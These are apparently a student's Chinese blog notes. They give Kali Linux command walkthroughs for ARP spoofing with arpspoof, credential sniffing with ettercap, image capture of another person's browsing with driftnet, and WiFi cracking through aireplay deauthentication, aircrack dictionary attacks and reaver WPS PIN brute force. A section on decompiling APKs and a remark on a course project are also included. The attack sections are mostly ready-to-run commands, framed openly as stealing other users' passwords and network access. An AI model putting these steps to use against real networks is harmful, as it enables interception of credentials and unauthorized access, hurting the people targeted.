arp攻击 断网/获取他人上网图片/获取他人的网站登陆口令

先用nmap找到目标

nmap -sP 192.168.0.1-200

192.168.0.105          //(主机A 我自己的电脑)

echo 1 > /proc/sys/net/ipv4/ip_forward   //进行IP转发(echo 0即断网)

 

arpspoof -i <网卡名> -t <欺骗的目标> <我是谁>

arpspoof -i eth0 -t 192.168.0.105 192.168.0.1

// 终端1, 欺骗主机A :我是网关

arpspoof -i eth0 -t 192.168.0.1 192.168.0.105

//终端2, 欺骗网关:我是主机 A

 用 ettercap抓取账号密码

打开一个新终端

ettercap -Tq -i eth0

 

用driftnet获取目标主机的图片浏览记录

driftnet -i eth0

(eth0为我的笔记本内置网卡名称 USB网卡名称一般为wlan0)

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.0.105 192.168.0.1

欺骗时仍造成断网。

解决办法。把靶机ip和网关反一下。

通过欺骗网关可以拿到图片,至于账号密码能不能拿到要看登陆的网站了。

end

linux环境下反编译apk

kali linux

apktool

apktool d -f xxx.apk -o xxx

反编译后生成的文件目录

名称 存放内容
assets (未被编译)项目的assets文件夹
res (未被编译)项目的res文件夹 里面可以清楚的看到values, layout, drawble,anim,mipmap文件夹
smali (被编译)项目的Java文件,这里表现的不是.Java格式,是.smali格式

造成这个现象的原因是:

Android 的 assets 和 res 文件都不会编译为二进制文件,所以反编译后,基本都是能看到它的全貌.

Android 中 .Java 文件,在 JVM 编译之后变成 .class 文件,然后再经过Android 的虚拟机 Dalvik,代码编译为 .smali 文件

 

 

dex2jar

把hamalx.apk改成zip再解压 得到classess.dex

jd-gui

kail里没有

下载地址http://jd.benow.ca/

输入java -jar jd-gui-1.4.0.jar运行jd-gui

END

aircrack 艹wifi 抓包爆破

环境:kali linux

1 airmon-ng

2 airmon-ng start wlan0mon

airodump-ng wlan0mon

4 airodump-ng -w woshoubao -c 6(CH) –bssid 00:0F:01:A9:C3:B2 wlan0mon –ignore-negative-one

新终端

5 aireplay-ng –deaut 20 -a 00:0F:01:A9:C3:B2(路由器mac地址) -c BC:D1:**:**:**:** (机器mac地址)wlan0mon –ignore-negative

aircrack-ng -w 123.txt(密码字典)woshoubao-01.cap

 

aircrack 艹wifi——pin

环境 KALI LINUX

1.ifconfig

2.airmon-ng start wlan0


3.wash -i wlan0mon –C  (Wash 扫描开启WPS zhichi pin的网络)   and   airodump-ng wlan0mon (霸王硬上弓  PWR的值的绝对值小于70)

 


4.reaver -i wlan0mon -b 00:25:86:64:50:22 -vv
reaver -i wlan0mon -b 24:69:68:EA:C2:26 –d9 –t9 -vv
因为 –d9 –t9参数 防止pin死路由器。


通过pin码获取wifi密码: reaver -i mon0 -b mac -p pin码

 

2018.1.20 课程设计结束

所有科目考完后留校做了七天课程设计。

 

 

这是计科的课设,我承认我知道他们五天写这东西的时候有点心态爆炸。

因为我们的课设题目长这样…

 

五个过关,十个满分。

像我这种fish根本不去想什么满分的事情了,tan90.

所以我写了九个就拿去交了。